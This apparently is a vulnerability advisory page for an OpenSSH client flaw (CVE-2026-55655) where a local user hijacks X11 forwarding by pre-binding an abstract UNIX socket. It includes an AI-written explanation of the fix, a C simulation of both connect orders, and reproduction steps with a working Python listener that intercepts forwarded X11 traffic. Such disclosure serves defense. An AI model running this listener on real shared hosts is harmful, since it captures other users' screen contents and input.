VYPR
Unrated severity · NVD Advisory · Published Jun 23, 2026

OpenSSH: local MITM of X11 forwarding via abstract UNIX socket pre-binding in Red Hat Enterprise Linux OpenSSH client versions

CVE-2026-55655

Description

A flaw was found in OpenSSH. A local unprivileged attacker on a Linux client host can hijack client-side X11 forwarding connections. This is possible by pre-binding the preferred abstract X socket name when X11 forwarding is enabled and a local UNIX-domain X socket is used. A successful attack can compromise the confidentiality of forwarded X11 traffic, including sensitive window contents and input, and may allow some manipulation of the forwarded session.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.


Vulnerability mechanics

Root cause

"OpenSSH client's `connect_local_xsocket()` tries the Linux abstract UNIX socket before the filesystem socket, allowing an unprivileged local attacker to pre-bind the abstract name and hijack the forwarded X11 connection."

Attack vector

A local unprivileged attacker on the Linux client host pre-binds the abstract UNIX socket name (e.g. `\0/tmp/.X11-unix/X0`) before the OpenSSH client opens a forwarded X11 connection. Because Linux abstract UNIX sockets lack filesystem permission mediation, the attacker's listener receives the forwarded X11 session before the legitimate filesystem socket is tried. The attacker can then intercept forwarded X11 traffic, including sensitive window contents and input, and may substitute saved X11 authentication data into the hijacked stream [ref_id=1].

What the fix does

The proposed patch reverses the connection order in `connect_local_xsocket()`: the filesystem socket (`/tmp/.X11-unix/X%u`) is tried first, and the Linux abstract socket is retained only as a compatibility fallback [ref_id=1]. This closes the vulnerability because the filesystem socket is mediated by standard UNIX permissions and ownership, preventing an unprivileged local attacker from pre-binding it. The diff swaps the two `connect_local_xsocket_path()` calls and moves the `#ifdef linux` block after the filesystem attempt.
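To make the ordering concrete, the following is an added example (not OpenSSH code and not from the advisory's references): it stages a stand-in "X server" listener on a filesystem socket and an "attacker" listener on the abstract name built from the same string, then runs a client through both connect orders and reports which listener received it. The function names `xsocket_connect`, `simulate` and the `/tmp/x11-prebind-<pid>/X0` path are assumptions of the example; the real client uses `/tmp/.X11-unix/X%u`. Linux only, since the abstract namespace is a Linux feature.

```c
#include <errno.h>
#include <fcntl.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/un.h>
#include <unistd.h>

/* Fill sa/len for NAME either as a filesystem path or as a Linux abstract
 * name (sun_path[0] == '\0'): no file is created and no permission check
 * applies, so whoever binds the name first owns it. */
static socklen_t make_addr(struct sockaddr_un *sa, const char *name, int abstract)
{
    memset(sa, 0, sizeof *sa);
    sa->sun_family = AF_UNIX;
    if (abstract) {
        strncpy(sa->sun_path + 1, name, sizeof(sa->sun_path) - 2);
        return (socklen_t)(offsetof(struct sockaddr_un, sun_path) + 1 + strlen(name));
    }
    strncpy(sa->sun_path, name, sizeof(sa->sun_path) - 1);
    return (socklen_t)sizeof *sa;
}

/* Listening socket on NAME; non-blocking so accept() can say "no client". */
static int listen_unix(const char *name, int abstract)
{
    struct sockaddr_un sa;
    socklen_t len = make_addr(&sa, name, abstract);
    int fd = socket(AF_UNIX, SOCK_STREAM, 0);
    if (fd < 0) return -1;
    if (bind(fd, (struct sockaddr *)&sa, len) < 0 || listen(fd, 1) < 0 ||
        fcntl(fd, F_SETFL, O_NONBLOCK) < 0) { close(fd); return -1; }
    return fd;
}

static int connect_unix(const char *name, int abstract)
{
    struct sockaddr_un sa;
    socklen_t len = make_addr(&sa, name, abstract);
    int fd = socket(AF_UNIX, SOCK_STREAM, 0);
    if (fd < 0) return -1;
    if (connect(fd, (struct sockaddr *)&sa, len) < 0) { close(fd); return -1; }
    return fd;
}

/* Mirrors the two-attempt shape of connect_local_xsocket() (hypothetical name
 * here): fs_first == 0 is the pre-fix Linux order (abstract name tried first),
 * fs_first == 1 is the fixed order (filesystem socket first, abstract fallback). */
static int xsocket_connect(const char *path, int fs_first)
{
    int fd = connect_unix(path, fs_first ? 0 : 1);
    return fd >= 0 ? fd : connect_unix(path, fs_first ? 1 : 0);
}

/* 1 = attacker's abstract listener got the client, 0 = real socket did, -1 = neither. */
static int who_accepted(int attacker_fd, int xserver_fd)
{
    int c = accept(attacker_fd, NULL, NULL);
    if (c >= 0) { close(c); return 1; }
    c = accept(xserver_fd, NULL, NULL);
    if (c >= 0) { close(c); return 0; }
    return -1;
}

/* Run one connect order with both listeners staged. Returns who_accepted()'s
 * verdict, or -2 if the scratch directory could not be created. */
int simulate(int fs_first)
{
    char dir[48], path[64];
    int xserver, attacker, client, winner;

    /* Per-pid scratch dir: the same string is used as filesystem path AND as
     * abstract name, just as OpenSSH reuses "/tmp/.X11-unix/X%u" for both. */
    snprintf(dir, sizeof dir, "/tmp/x11-prebind-%ld", (long)getpid());
    if (mkdir(dir, 0700) < 0 && errno != EEXIST) return -2;
    snprintf(path, sizeof path, "%s/X0", dir);
    unlink(path);

    xserver  = listen_unix(path, 0);   /* stand-in for the real X server socket */
    attacker = listen_unix(path, 1);   /* unprivileged attacker pre-binds the name */
    client   = xsocket_connect(path, fs_first);
    winner   = client >= 0 ? who_accepted(attacker, xserver) : -1;

    if (client >= 0) close(client);
    if (attacker >= 0) close(attacker);
    if (xserver >= 0) close(xserver);
    unlink(path);
    rmdir(dir);
    return winner;
}

int main(void)
{
    printf("abstract-first (pre-fix):  %s\n", simulate(0) == 1 ? "hijacked by pre-bound abstract name" : "not hijacked");
    printf("filesystem-first (fixed):  %s\n", simulate(1) == 0 ? "reached the real X socket" : "hijacked");
    return 0;
}
```

Running it shows the attacker listener winning in the abstract-first order and the real filesystem socket winning in the fixed order, with nothing else changed. The fixed order still falls back to the abstract name when the filesystem socket is absent, which is why the page describes the abstract attempt as retained only for compatibility.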

Preconditions

  • auth: Local unprivileged code execution on the Linux host running the OpenSSH client
  • config: Client-side X11 forwarding enabled (`-X`, `-Y`, or equivalent configuration)
  • config: Local DISPLAY resolves to a UNIX-domain X socket such as `:0` or `unix:0`
  • input: A forwarded X11 connection must be opened while the attacker has pre-bound the matching abstract socket name

Reproduction

1. On a Linux system running the OpenSSH client, confirm the local display uses a UNIX-domain socket such as `:0` or `unix:0` (check `echo $DISPLAY`).

2. Before opening a forwarded X11 connection, start a local unprivileged listener bound to the matching abstract socket name. For display `:0`:

```python
import socket

# Abstract-namespace address: a leading NUL byte followed by the same string
# the OpenSSH client uses for the filesystem socket of display :0.
# Binding it creates no file and is subject to no permission check.
NAME = "\0/tmp/.X11-unix/X0"

s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
s.bind(NAME)
s.listen(1)
c, _ = s.accept()   # blocks until the ssh client's abstract-first connect lands here
print("accepted; first bytes:", c.recv(64).hex())
```

3. In another terminal, start an SSH session with X11 forwarding enabled:

```bash
ssh -X user@remote
```

4. From the remote shell, trigger an X11 application so that the client opens the forwarded X11 channel, for example:

```bash
xclock
```

5. Observe that the attacker listener accepts the connection and receives the initial X11 bytes before the legitimate filesystem socket `/tmp/.X11-unix/X0` is used.

6. Optional confirmation:

```bash
strace -f -e connect ssh -X user@remote
```

Expected result: tracing shows a successful `AF_UNIX` connect to the abstract socket name `\0/tmp/.X11-unix/X0` (strace prints the leading NUL as `@`, i.e. `@/tmp/.X11-unix/X0`) before any successful connect to `/tmp/.X11-unix/X0`.

Generated on Jun 23, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
